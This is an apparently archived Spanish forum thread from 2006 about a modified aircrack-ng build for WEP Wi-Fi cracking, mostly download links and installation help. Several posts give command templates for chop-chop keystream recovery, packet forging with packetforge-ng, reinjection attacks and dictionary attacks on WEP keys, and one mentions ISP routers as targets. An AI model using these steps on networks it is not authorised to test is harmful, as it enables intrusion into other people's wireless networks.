aireplay-ng -5 -a <bssid> -h <smac> -c <dmac> -y <prga.xor> -k <srcIP[:port]> -l <destIP[:port]> -o <iface>

bueno ya me contareis


Título: Re: Ataque -5 remoteflood estara disponoble en MOTHERFUCKER EDITION 0.2
Publicado por: NetFree222 en 28 Agosto 2006, 14:16 pm
Jode me voy un mes de vacaciones y cuando vuelvo aparecen hasta nuevos atakes...alucino chavales,bueno voy a buscar haber si en este mes han aparecido mas novedades.Un saludo chavales ;)


Título: Re: Aicrack-ng MOTHERFUCKER EDITION V 0.2 (Ya disponible)
Publicado por: Hwagm en 28 Agosto 2006, 20:19 pm
Descarga directa sin tener que usar ningun boton secundario ni ninguna cosa rara.............. ;D , es coña no se molesten.

]Descarga directa[/color] (http://hwagm.elhacker.net/descargas/linux4/aircrack-ng-0.6_MOTHERFUCKER_EDITION_0.2.zip)

tanto rollo con la version 0,1 que no queria ponerla en mi pagina (server) y veo que cualquier de las miles de fotos de mi pagina que no valen ni para mirarlas ocupan mucho mas que estos ficheros.

Asi que disculpas al autor. AUnque me podia haber rebatido el criterio que le di para no ponerlas aludiendo que ocupaba poco, jejjejeje

Ahi va:


]Descarga directa[/color] (http://hwagm.elhacker.net/descargas/linux4/aircrack-ng-0.6_MOTHERFUCKER_EDITION_0.2.zip)

PD: tenias que haber puesto todo lo de este new ng en el mismo post, asi lo hubieras tenido todo centrado desde sus incios, incluso se hubiera puesto como chincheta, pero ahora esta todo por ahi desperdigado.


Título: Re: Aircrack-ng MotherFucker Edition version 0.2
Publicado por: Armenos en 28 Agosto 2006, 20:58 pm
Veamos, se ha intentado juntar todo (lo mejor que que he podido, habrán incongruencias de ciertos mensajes por fechas, mirar los títulos y sabréis cual va con cual), y ahora paso a subirlo a chincheta temporal. Espero que todos contribuyáis a ayudar a thefkboss testeando este magnífico programa. Saludos.


Título: Re: Aircrack-ng MotherFucker Edition version 0.2
Publicado por: Hwagm en 28 Agosto 2006, 22:07 pm
ok, ya lei el IM
 ;)


Título: Re: Aircrack-ng MotherFucker Edition version 0.2
Publicado por: thefkboss en 28 Agosto 2006, 23:40 pm
se puede hacer otro tipo de reinyeccion sin forjar el ARP mediante
PRIMERO CHOP-CHOP no hace falta descifrar el paquete utilizamos el archivo *.xor generado de la siguiente forma
Citar
aireplay-ng -3 -b MAC AP -h MAC cliente -x 1000  -y ARCHIVO.XOR ath0
es ub¡na reinyeccion muy rapida con un nivel de señal de 10 se reinyecta a unos 500 paquetes sefungo


Título: Re: Aircrack-ng MotherFucker Edition version 0.2
Publicado por: logger02 en 29 Agosto 2006, 16:07 pm
a ver, es q en linux toi un pokillo pegao, lo q se lo e aprendido gracias a este foro de wireless,
tengo la ipw2200 tengo el troppix y tengo el aircrackmotherfucker0.2  sirve el kernel del troppix o q otro me aconsejais mejor ubutu o cual.ah hasta q no formatee me tendre q conformar con los live cds, porque el hax-puppy no me va en el centrino no se, tendre q verlo mas detenidamente
gracias, aki tenes otro tester


Título: Re: Aircrack-ng MotherFucker Edition version 0.2
Publicado por: [DRACO] en 29 Agosto 2006, 22:02 pm
Hola thefkboss te felicito por el programita jejeje qria decirte si podria ser un manual para novatillos como yo jejej con fotos y eso un tutorial gracias


Título: Re: Aircrack-ng MotherFucker Edition version 0.2
Publicado por: thefkboss en 29 Agosto 2006, 22:04 pm
si se podria hacer haber si me pongo a ello


Título: Re: Aircrack-ng MotherFucker Edition version 0.2
Publicado por: Hwagm en 30 Agosto 2006, 01:04 am
Mejor abre un post nuevo para esta pregunta. Pero 1 averigua que chipset lleva y ya tendras media solucion.


Título: Re: Aircrack-ng MotherFucker Edition version 0.2
Publicado por: thefkboss en 30 Agosto 2006, 09:18 am
va a salir una nueva version la 0.3 ya q puede haber un posible fallo en el ataque 5 hay veces q no funciona como deberia.
detodas formas el reponsable de la parte de programacion Hirte q hace posibles estas nuevas modificaciones ha cambiado el codigo y ha creado un nuevo ejecutable el packetforge-ng.c


Título: Re: Aircrack-ng MotherFucker Edition version 0.2
Publicado por: thefkboss en 30 Agosto 2006, 14:33 pm
bueno ya la tengo terminada haber si meto algo mas de codigo y al final de esta semana sale


Título: Re: Aircrack-ng MotherFucker Edition version 0.2
Publicado por: palote06 en 30 Agosto 2006, 19:58 pm
He probado la versión compilada de windows y la opción de aircrack-ng con la opción de ver ASCII (-s) no funciona. Solo se ve el código hexadecimal. ¿Hay algun método para verlo en ASCII?



PD: Me parece muy bueno este programa. Cuano lo logre instalar en linux ya os contaré, todavia no he podido (necesito un manual de como instalarlo)


Título: Re: Aircrack-ng MotherFucker Edition version 0.2
Publicado por: logger02 en 30 Agosto 2006, 20:17 pm
para instalarlo en linux esta puesto mas atras.

yo por ejemplo copie el .zip en /home/troppix/ e hice

unzip  aircrack-ng-0.6 MOTHERFUCKER EDITION 0.1.zip
cd aircrack-ng-0.6
make
make install

luego para ejecutarlo lo hago desde esta misma carpeta  /home/troppix/aircrack-ng-0.6

otro compañero del foro lo instala en la carpeta donde esta el aircrack /usr/local/bin , lo guarda en esta carpeta y hace

make clean && make && make install

con el make clean borra la anterior instalacion

si no me equivoco mucho creo q es algo así, saludos


Título: Re: Aircrack-ng MotherFucker Edition version 0.2
Publicado por: palote06 en 30 Agosto 2006, 20:29 pm
para instalarlo en linux esta puesto mas atras.

yo por ejemplo copie el .zip en /home/troppix/ e hice

unzip  aircrack-ng-0.6 MOTHERFUCKER EDITION 0.1.zip
cd aircrack-ng-0.6
make
make install

luego para ejecutarlo lo hago desde esta misma carpeta  /home/troppix/aircrack-ng-0.6

otro compañero del foro lo instala en la carpeta donde esta el aircrack /usr/local/bin , lo guarda en esta carpeta y hace

make clean && make && make install

con el make clean borra la anterior instalacion

si no me equivoco mucho creo q es algo así, saludos
Gracias, voy a probar a ver si va, aunque eso he estado haciendo. No se si influirá que utilizo el hax puppy de esta web, a ver si fuera eso. Voy a probar con otra distribución.


Título: Re: Aircrack-ng MotherFucker Edition version 0.2
Publicado por: logger02 en 30 Agosto 2006, 20:48 pm
puede ser, es q no se q kernell utiliza el aircrack , yo es q utilizo el troppix porque pa los drivers de la ipw2200 el kernell del hux no sirve porque es mas antiguo 1.5 o algo asi creo, y el de los driver son un 2.x . kizas el del aircrack supongo q tambien

saludos


Título: Re: Aircrack-ng MotherFucker Edition version 0.2
Publicado por: sunbikers en 30 Agosto 2006, 22:37 pm
Y si usamos la live de de troppix, como se hace?
gracias
Nota: en windows no se puede, verdad?

gracias de nuevo


Título: Re: Aircrack-ng MotherFucker Edition version 0.2
Publicado por: rh3nt0n en 30 Agosto 2006, 22:39 pm
Citar
Gracias, voy a probar a ver si va, aunque eso he estado haciendo. No se si influirá que utilizo el hax puppy de esta web, a ver si fuera eso. Voy a probar con otra distribución.

tienes el archivo con las sources del hax-puppy ? si no los tienes no podras compilar este aircrack ... ni ninguno ...

ehale un oo al hilo de hax-puppy ,los primeros post..

se puede instalar perfectamente .

saludos

PD: tambien se puede instalar GCC desde el gestor de paketes dotpup ..


Título: Re: Aircrack-ng MotherFucker Edition version 0.2
Publicado por: logger02 en 30 Agosto 2006, 22:48 pm
en windows no he probado, porque no tengo un atheros jeje

en linux puedes seguir los pasos que he dixo:
copias aircrack-ng-0.6_MOTHERFUCKER_EDITION_0.2.zip en /root/ (en troppix en el escritorio sale como la carpeta root´s home)

y ejecutas estos comandos

unzip  aircrack-ng-0.6 MOTHERFUCKER EDITION 0.1.zip
cd aircrack-ng-0.6
make
make install


Título: Re: Aircrack-ng MotherFucker Edition version 0.2
Publicado por: Serch_Serch en 30 Agosto 2006, 23:10 pm
existe una version de este programa en windows?? No me he enterao...


Título: Re: Aircrack-ng MotherFucker Edition version 0.2
Publicado por: logger02 en 30 Agosto 2006, 23:23 pm
yo tampoco pero palote dice algo asi en la pag anterior preguntale a el a ver si sabe algo


Título: Re: Aircrack-ng MotherFucker Edition version 0.2
Publicado por: thefkboss en 30 Agosto 2006, 23:35 pm
no no existe xq no lo he desarrollado para windows xq en windows no se puede reinyectar.Asi q paque lo quieres ya q las caracteristicas mejoradas son mas q nada para reinyectar


Título: Re: Aircrack-ng MotherFucker Edition version 0.2
Publicado por: palote06 en 30 Agosto 2006, 23:47 pm
no no existe xq no lo he desarrollado para windows xq en windows no se puede reinyectar.Asi q paque lo quieres ya q las caracteristicas mejoradas son mas q nada para reinyectar
Tienes razón, metí la pata hasta el fondo, me confundí con la version normal. Mil disculpas. Aún así la instalación todavia se resiste, veré lo de la compilación a ver si fuera eso.


Título: Re: Aircrack-ng MotherFucker Edition version 0.2
Publicado por: Calabazin en 31 Agosto 2006, 05:41 am
buenas noches una pregunta para los del foro, yo no he podido hechar a andar mi tarjeta de red inalambrica en el dvd live del knoppix alguien me podria ayudar es la version 4 y baje una version del air crack para win pero el airdump no me reconoce la tarjeta inalambrica se me hace interesante comentar q corre sobre xp x64 y los driver de la tarjeta son para este sistema tendra algo q ver por lo q no la reconoce, pero en el dvd del kanoppix tampoco la tarjeta es una broadcom 54g 802.11b/g me interesa q me pudieran ayudar por que lo voy a utilizar para mi anteproyecto sobre warchalking por su ayuda de antemano gracias... ::)


Título: Re: Aircrack-ng MotherFucker Edition version 0.2
Publicado por: reinoso en 31 Agosto 2006, 12:14 pm
Con el troppix 1.2 la ipw2200 me la coge como ipw2100 y eso después de hacer rmmod. Además no me inyecta pero sí captura. Habría que parchear con el parche para la ipw2200 que viene en el pack de aircrack-ng 0.2 una vez cargado el troppix live cd 1.2? cómo se parchea?

P.D. El troppix 1.0 sí me la pilla como ipw2200 pero no hace nada de nada, aparentemente entra en modo monitor y todo bien pero ni captura, ni pilla ninguna red ni nada.

Saludos y gracias.


Título: Re: Aircrack-ng MotherFucker Edition version 0.2
Publicado por: logger02 en 31 Agosto 2006, 13:23 pm
para el tema del parche abri un post

http://foro.elhacker.net/index.php/topic,138168.0.html

pero yo tampoco lo consigo, mira te digo lo que me dijo puntillo q es el unico q lo ha conseguido a ver si tu no tenes problema, lo de que te la coje como ipw2200 no te preocupes a mi me hace lo mismo pero captura trafico, con los drivers q tenes no sirven necesitas otros descargatelos de aqui:
http://ipw2200.sourceforge.net/#downloads
despues aplicas el parche que trae el aircrack-ng-0.6

despues compilas (make)
y instalas (make install)
yo me he quedado ahi porque eso me falla y no se porque, prueba tu a ver si a ti no te falla

ah postea si eso en el hilo q ya esta abierto para ese tema, mas que nada para no molestar demasiado, cuando consiga parchear correctamente posteare paso por paso lo que hago para que inyecte, pero toavia creo q me queda un poco porque de linux mucha idea no tengo


Título: Re: Aircrack-ng MotherFucker Edition version 0.2
Publicado por: thefkboss en 1 Septiembre 2006, 09:22 am
una estupida pregunta dirigida a todos aquellos q tiene la IPW2200.
usais live-cd no?
habeis probado a bajaros el modulo SLAX actualizado del kernel y de las cabeceras grabarlo dentro del cd en la parte modulo y ejecutarlo creo q asi no tendriais fallos al compilar los drivers

http://www.slax.org/modules.php?action=search&q=kernel


Título: Re: Aircrack-ng MotherFucker Edition version 0.2
Publicado por: rh3nt0n en 1 Septiembre 2006, 10:33 am
j****!!  siempre se me escapa algo  >:(

pues no ..ayer mismo instalé ubuntu .. sin ganas y sin resultados positivos ..

dices que existe un modulo del nuevo driver parcheado para inyeccion ?

lo pruebo esta tarde ..
saludos

ES ESTE MODULO ?
http://www.slax.org/modules.php?category=drivers&id=807&name=ipw2200+firmware

o por el contrario te refieres a instalar las headers .. y compilar el driver sobre live .. ?

la verdad que no me apetece muxo andar instalando ni slax ni back|track ni nada que se parezca a ello .. no me gustan esas distros ..



saludos


Título: Re: Aircrack-ng MotherFucker Edition version 0.2
Publicado por: logger02 en 1 Septiembre 2006, 11:24 am
tampoco habia caido yo en hacer eso, mejor dixo no sabia que se podia hacer jejeje, creo q queda demostrado q soy novato en linux, jijiji


Título: Re: Aircrack-ng MotherFucker Edition version 0.2
Publicado por: rh3nt0n en 1 Septiembre 2006, 11:32 am
uhi ..!!!!  ;D ;D

my slax creator ,tiene muxisimas posibilidades , hay por el foro modulos preparaos por oxirix ,de el CCW7 y alguna cosa mas .. para poder agregarselo a back|track o cualkier distro basada en slax .. y asi tener una live'cd adaptada a tus gustos ...

es muy recomendable probarlo ,ademas de entretenido ..tambien tienes la posibilidad de crear tus propios modulos ,aunke eso ya tiene mas sustancia ...

saludos


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible
Publicado por: thefkboss en 1 Septiembre 2006, 12:34 pm
pues me referia a te refieres a instalar las headers .. y compilar el driver sobre live .. 

Bueno como ya ha sacado la version 0.3 y asi me adelanto al Mister X.

Caracteristicas parches mejorados para las IPW2200 ya aplicados sobre aireplay-ng para reinyectar
Y un nuevo programa packetforge-ng q sirve para crear paquetes del tipo ARP UDP ICMP CUSTOM y reinyectarlos y asi conseguir gran cantidad te IVS.

Lo primero es realizarzar el ataque CHOP-CHOP y despues usamos el Packetforge de la siguiente manaera.

Citar
packetforge-ng --tipo de paquete   -a <bssid> -h <smac> -c <dmac> -y <prga.xor> -w ejemplo -k <IP origen[:puerto]> -l <IP destino[:puerto]> -o <modo>

eso hara q se cree un archivo llamado ejemplo
y ahora lo reinyectamos con ataque 2 el 3 no vale xq solo reinyecta ARP asi q usamos

Citar
aireplay-ng -2 -r ejemplo <iface>

debemos insertar el paquete cada 30 segundo asi q usamos
Citar
aireplay-ng -2 -r ejemplo -x 0.033 <iface>


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible
Publicado por: rh3nt0n en 1 Septiembre 2006, 13:28 pm
lo malo de todo esto , es que el atake chopchop .. hay veces que no funciona y te puedes aburrir esperando a que construya el archivo .xor ..

hay que probarlo

dos preguntas ,

que tipo de paketes , si es que se pueden discriminar .. usas ?
me refiero al tamaño .. etc ..

que parametros le metes a el atake -4 para que forme sin problemas el archivo .xor ?

saludos


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible
Publicado por: thefkboss en 1 Septiembre 2006, 13:42 pm
haber el atake -4 lo tienes q construir siempre y cuando haya un cliente conectado a esa AP

Citar
aireplay-ng -4 -h mac del cliente del AP(NO VALE NINGUNA OTRA )

Esperas a q aparezca un paquete cualquiera de es AP aunque tu cliente no aparezca como destinatario y lanza el ataque te saca las IP

el nuevo propgrama sirve para geberar ademas de ARP como hace el arpforge tarfico de tipo UDP, ICMP, CUSTOM lo q tienes q hacer es especificarlo antes de crear el paquete a enviar es decir si es udp pues pones
Citar
packetforge-ng --udp   -a <bssid> -h <smac> -c <dmac> -y <prga.xor> -w ejemplo -k <IP origen[:puerto]> -l <IP destino[:puerto]> -o <modo>

si es icmp
Citar
packetforge-ng --icmp   -a <bssid> -h <smac> -c <dmac> -y <prga.xor> -w ejemplo -k <IP origen[:puerto]> -l <IP destino[:puerto]> -o <modo>

asi sucesivamente.
necesitas el archivo *.xor porq lo q hace es volver a encriptarlo con la contraseña correcta para q puedas enviarle el paquete  q el router lo reconozca y  genere trafico


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible
Publicado por: rh3nt0n en 1 Septiembre 2006, 13:45 pm
ok ,gracias por la aclaracion

pero hace un apr de noches lo estuve probando con mi ap , y varios clientes conectaos .. y me costaba bastante formar el .xor ..
espero que solo fuera un error sintactico .. aunek creo recordar que el comando que utilizaba era ese ..

esta noche lo pruebo y te cuento ..espero que sea con la ipw2200 ...  ;D ;D asi matamos dos pajaros de un tiro ....

saludos

PD: ya ha habido alguien que haya probado la ipw2200 usand o el buffer ciclico con resultados optimos ??



Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible
Publicado por: Hwagm en 1 Septiembre 2006, 19:34 pm
http://hwagm.elhacker.net/descargas/linux4/aircrack-ng-0.6_MOTHERFUCKER_EDITION_0.3.zip


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible
Publicado por: thefkboss en 1 Septiembre 2006, 19:38 pm
vale ya esta cambiado el link


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible
Publicado por: thefkboss en 2 Septiembre 2006, 15:48 pm
de moemnto ha habido un error por mi parte ya esta corregido este es el enlace bueno

ya esta corregido


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible
Publicado por: Hwagm en 2 Septiembre 2006, 18:45 pm
http://hwagm.elhacker.net/descargas/linux4/aircrack-ng-0.6_MOTHERFUCKER_EDITION_0.3.zip



Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible
Publicado por: kmorfo en 6 Septiembre 2006, 01:37 am
Buenas e estado probandolo pero el aireplay-ng no me inyecta paquetes, tengo el hostap y por lo que e leido hay que parchear el driver o el kernel no se en eso ando un poco pez.
Me e descargado el kernel 2.6.17.11 y lo intente parchear pero no me tira y e intentado parchear el ultimo driver tambien, los 2 con:
patch -Np1 -i hostap-driver.patch

haber si alguien me puede echar una cable. gracias de antemano


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible
Publicado por: Yako_83 en 6 Septiembre 2006, 19:31 pm
Tengo instaaldo el backtrack final en el HD.
He bajado la version motherfucker 0.3 y la he instalado con
Código:
make clean && make && make install
para borrar la que viene con el backtrack.
Antes usaba el script traducido por ti y en la primera opcion de scanear alternando canales me funcionaba, ahora con esta version(la que no viene con el live cd) directamente se me cierra la ventana que tendria que abrirme para mostrar el scaneo de los canales . Si especifico un canal en concreto con la opcion 2 si me funciona.
Mi tarjeta es una pcmcia SMCWCBT-G.
He comprobado que sin usar el script y escribiendo
Código:
airodump-ng --ivs -w ath0
  si scanea todos los canales asi que deduzco que habra que modificar algo del script.

Alguna ayuda?


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible
Publicado por: logger02 en 6 Septiembre 2006, 21:28 pm
packetforge-ng --udp   -a <bssid> -h <smac> -c <dmac> -y <prga.xor> -w ejemplo -k <IP origen[:puerto]> -l <IP destino[:puerto]> -o <modo>

que pongo en modo???????????



Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible
Publicado por: pintuflas en 6 Septiembre 2006, 21:47 pm
Buenas, solo queria comentarte que estaria bien poner en la primera pagina todos los ataques que puede el aircrack-ng motherfucker edition 0.3, tanto los nuevos ataques como los de siempre. Porque veo que hay varios por todo el hilo y estaria bien tenerlos todos juntos.

Muchas gracias.


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible
Publicado por: thefkboss en 6 Septiembre 2006, 22:02 pm
logger02 el -o directamente es el modo no hace falta poner nada mas

ha por cierto en este ejemplo te crea un archivo llamdo prueba q es el q reinyectas con el ataque 2

pintuflas llevas razon cuando tenga tiempo me pongo a ello pero tendria q hacer un manual pienso q seria mejor


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible
Publicado por: Serch_Serch en 7 Septiembre 2006, 12:42 pm
Para los q no tenemos ni idea de linux, no se puede hacer como un instalador?? (tipo windows) Lo quiero instalar y la verdad, ya no se que hacer, make, make all parece ser q depende de la distribucion q uses no??


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible
Publicado por: Armenos en 7 Septiembre 2006, 12:44 pm
Para los q no tenemos ni idea de linux, no se puede hacer como un instalador?? (tipo windows) Lo quiero instalar y la verdad, ya no se que hacer, make, make all parece ser q depende de la distribucion q uses no??

Salvo que tu distro no tenga las herramientas de compilación todas usan el make, make install ... Aparte de poder instalar de otras formas depende en que estén basadas... Saludos.


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible
Publicado por: Serch_Serch en 7 Septiembre 2006, 15:11 pm
No me pegueis por mi torpeza, pero linux y yo estamos peleaos.

Bueno, quiero instalar este programa en el Troppix 1.2 (x lo q he leido, en el hax-puppy 1.3 faltan algunos archivos...)

Bueno. Comento los pasos.

1.- Lo descargo en mis documentos
2.- Arranco con el live-cd y lo copio en root. Aqui tengo mi primer problema. No se donde está el explorador de archivos, abro una ventana de firefox y escribo /mnt/hda1
3.- Lo descomprimo: unzip aircrack-ng-0.6.....
y lo hace bien, xq lo hace.

Observo, q me ha generado un directorio llamado: aircrack-ng-0.6.....-corregido
4.- Intento acceder a ese directorio y no puedo, me dice q pongo mal el nombre, he probado con cd aircarck-ng-0.6 y nada, con cd aircrack-ng-0.6-...-corregido y nada

Soy bastante burro en linux no??

Por cierto, la orden dir en linux, como es??


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible
Publicado por: *dudux en 7 Septiembre 2006, 15:35 pm
Citar
Por cierto, la orden dir en linux, como es??

es  cd ,aunque creo que dir tambien es una orden

Citar
Bueno. Comento los pasos.

1.- Lo descargo en mis documentos


porque no lo haces con la orden wget???

Citar
2.- Arranco con el live-cd y lo copio en root. Aqui tengo mi primer problema. No se donde está el explorador de archivos, abro una ventana de firefox y escribo /mnt/hda1

nautilus por ejemplo como explorador........
para que una ventana del firefox????abre un terminal.........

cd /mnt/hda1/Documents and Settings/serch_serch/Mis documentos/

Citar
3.- Lo descomprimo: unzip aircrack-ng-0.6.....
y lo hace bien, xq lo hace.

yo lo haria con #tar -zxvf aircrack-ng-0.6..........
make
make install



Citar
se instala como el original
debes de tener las sources o al menos gcc para poder compilarlo ..
Código:
unzip  aircrack-ng-0.6 MOTHERFUCKER EDITION 0.1.zip
cd aircrack-ng-0.6
make
make install

claro que si es zip mejor con unzip........


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible
Publicado por: Armenos en 8 Septiembre 2006, 09:21 am
La orden dir es ls. Saludos.

Para nombres largos usar el tabulador, así si tiene signos raros los escribirá solo siempre que no haya archivos que se llamen igual. Por ejemplo aircrack- más tabulador igual a aircrack-ng.0.6.


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible
Publicado por: Serch_Serch en 12 Septiembre 2006, 13:26 pm
Gracias.

Una sugerencia para thefkboss. No puedes hacer q con tu programa, cuando vaya escuchando paquetes te diga la IP de la puerta de enlace??? Mi idea es q puedes hacer algo automatico por si se tiene el DHCP desactivado.

Gracias


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible
Publicado por: Armenos en 12 Septiembre 2006, 13:30 pm
Gracias.

Una sugerencia para thefkboss. No puedes hacer q con tu programa, cuando vaya escuchando paquetes te diga la IP de la puerta de enlace??? Mi idea es q puedes hacer algo automatico por si se tiene el DHCP desactivado.

Gracias

Imposible sin la pass. Tan cómodos no seamos jejeje


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible
Publicado por: thefkboss en 12 Septiembre 2006, 13:35 pm
como dice Armenos sin la pass no puedes saber la puerta de enlace.
lo q estoy intentando ahora es compilar la version para windows.eso si el aireplay como simpre no estara xq no funciona


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible
Publicado por: Serch_Serch en 12 Septiembre 2006, 13:38 pm
Bueno, como complemento. Una vez encontrada el pass, que mire si tiene desactivado el DHCP y si está desactivado q muestre la IP de la puerta de enlace. Seria ya la leche!!!


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible
Publicado por: Armenos en 12 Septiembre 2006, 13:45 pm
Bueno, como complemento. Una vez encontrada el pass, que mire si tiene desactivado el DHCP y si está desactivado q muestre la IP de la puerta de enlace. Seria ya la leche!!!

Ains, no se sabe tan fácilmente si una red tiene el dhcp deshabilitado ... Sólo se podría basar en un default, o sea las ips típicas... lo mejor es hacerlo uno mismo así se aprende. Saludos.

P.d. Ethereal rulez :)


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible
Publicado por: thefkboss en 12 Septiembre 2006, 15:27 pm
bueno ya esta disponible la version para windows

http://www.sendspace.com/file/mc8hpz

los ficheros q tiran en windows estan en la carpeta bin.
lo bueno de este aircrack es q puedes usar diccionario contra wep


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible para windows
Publicado por: rh3nt0n en 12 Septiembre 2006, 17:24 pm
muchas gracias  ::)

saludos


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible para windows
Publicado por: thefkboss en 12 Septiembre 2006, 18:45 pm
estaba pensando en q si quieres rh3nt0n tambien te hago el tullo para q funcione en windows q te parece


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible para windows
Publicado por: Serch_Serch en 12 Septiembre 2006, 20:20 pm
Fantastico!!!

Vaya trabajo.

Gracias x tu trabajo!!!


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible para windows
Publicado por: capon en 12 Septiembre 2006, 20:26 pm
He instalado el LiveCD Knoppix en mi PC y al intenar compilar el Aircrack-ng Motherfucker me dice lo siguiente:

make: *** No hay ninguna regla para construir el objetivo `src/sha1-mmx.S', necesario para `aircrack-ng'.  Alto.

¿Alguien sabe como instalarlo?: Gracias.


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible para windows
Publicado por: kike49 en 12 Septiembre 2006, 21:33 pm
bueno ya esta disponible la version para windows

http://www.sendspace.com/file/mc8hpz

los ficheros q tiran en windows estan en la carpeta bin.
lo bueno de este aircrack es q puedes usar diccionario contra wep

¿el manual  para rular la version de windows es el mismo que para linux?
Gracias por todo, thefkboss.


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible para windows
Publicado por: thefkboss en 12 Septiembre 2006, 21:42 pm
pues el manual es el mismo si (solo si es para windows)
solo cambia q ademas de poder usar un diccionario con wap lo puedes usar con wep esto viene de perlas para las imagenio y asi no tienes q usar el weplab sino q con el mismo aircrack tira


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible para windows
Publicado por: kike49 en 12 Septiembre 2006, 21:51 pm
osea, el del aircrack ng, o hay algo mas expecifico?


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible para windows
Publicado por: Serch_Serch en 13 Septiembre 2006, 07:08 am
Se comento algo de un tutorial con un par de capturas no?? Sabe alguien si está x algun lado?? o aun no está preparado...

Gracias


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible para windows
Publicado por: thefkboss en 13 Septiembre 2006, 11:03 am
pues no existe ningun manual.El manual base q podeis seguir es el q hice sobre aircrack-ng normal los demas ataques especiales q tiene este estan comentados en este post en algunas de las paginas pero andan un poco desperdigados tambien estan comentados en el hilo de inyeccion de la IPW2200 pero esos tienen q ver mas con esa tarjeta pero tambien se comentan.


PD:joEEEEEer haber si me pongo ha hacerlo y a juntarlo todo


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible para windows
Publicado por: rh3nt0n en 13 Septiembre 2006, 11:15 am
Relax thefkboss ... que luego uno se aturulla y no salen bien las cosas .. que vaya ritmo llevas ..

si te agovias lo voy adelantando yo ... si te parece ..

saludos


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible para windows
Publicado por: thefkboss en 13 Septiembre 2006, 11:27 am
pues como veas si te lo quieres currar tu como quieras coje de base el q hice y le añades las modificaciones q he comentado.
hacemos una cosa metete en el otro foro(ya sabes cual es) y metete en miseccion de mauales habres un post nuevo y copias mi post del aircrack-ng q hay hay en el otro vas añadiendo cosas de comandos capturas y demas q tengas hecho y  yo tambien y lo q este mal te lo corrigo, te lo ordeno y demas q te parece.A por cierto cuando llege a kasa te envio tu version en español para windows q ya la tengo terminada.


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible para windows
Publicado por: rh3nt0n en 13 Septiembre 2006, 12:07 pm
ok , a la tarde me pongo con ello ..

saludos


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible para windows
Publicado por: rh3nt0n en 13 Septiembre 2006, 22:45 pm
ya hay un borrador donde tu ya sabes ... echale un vistazo ...
saludos


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible para windows
Publicado por: Serch_Serch en 13 Septiembre 2006, 23:37 pm
joerrr, pues yo no!!! Por que no lo dices un poco mas claro??


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible para windows
Publicado por: Armenos en 13 Septiembre 2006, 23:39 pm
http://seguridadwireless.net/foro/

Es el caldo de cultivos de algunas cosas jejeje


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible para windows
Publicado por: Serch_Serch en 13 Septiembre 2006, 23:48 pm
jeje, gracias...

Pero no se pueden poner un ejemplo practico?? Tal y como viene en "Manual Básico Hacking WEP Troppix" de Uxio, se q es mas pesao pero nos queda mas claro...

Gracias x vuestro trabajo


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible para windows
Publicado por: Armenos en 13 Septiembre 2006, 23:50 pm
Eso para el currante que tome nota, pero si sabes la teoría sabrás la práctica. Saludos.


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible para windows
Publicado por: rh3nt0n en 13 Septiembre 2006, 23:52 pm
jeje, gracias...

Pero no se pueden poner un ejemplo practico?? Tal y como viene en "Manual Básico Hacking WEP Troppix" de Uxio, se q es mas pesao pero nos queda mas claro...

Gracias x vuestro trabajo

es un borrador .... :)

saludos


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible para windows
Publicado por: thefkboss en 14 Septiembre 2006, 10:31 am
haber el manejo del aircrack-ng motherfucker es igual q el de toda la vida es decir vale el manual q hice en este vamos a comentar solo las diferencias es decir los comando nuevos.
Los comando nuevos unicamente sirven para:
-descifrar wep mediante diccionario
-utilizar multimples tarjetas para la captura de paquetes es decir puedes usar hasta 8 capturando al mismo tiempo diveros canales
-inyeccion de paquetes tipo udp..... cifrados
-bufer ciclico

tampoco es q cambien una burrada solo son simples pijadas
pero vamos yo creo q son utiles algunas veces xejemlo en vex de usar el wlandecrypter y el weplab usas aircrack+wlandecyrpter


Título: Re: Aircrack-ng MotherFucker Edition version 0.3 ya disponible para windows
Publicado por: rh3nt0n en 14 Septiembre 2006, 11:04 am
haber el manejo del aircrack-ng motherfucker es igual q el de toda la vida es decir vale el manual q hice en este vamos a comentar solo las diferencias es decir los comando nuevos.
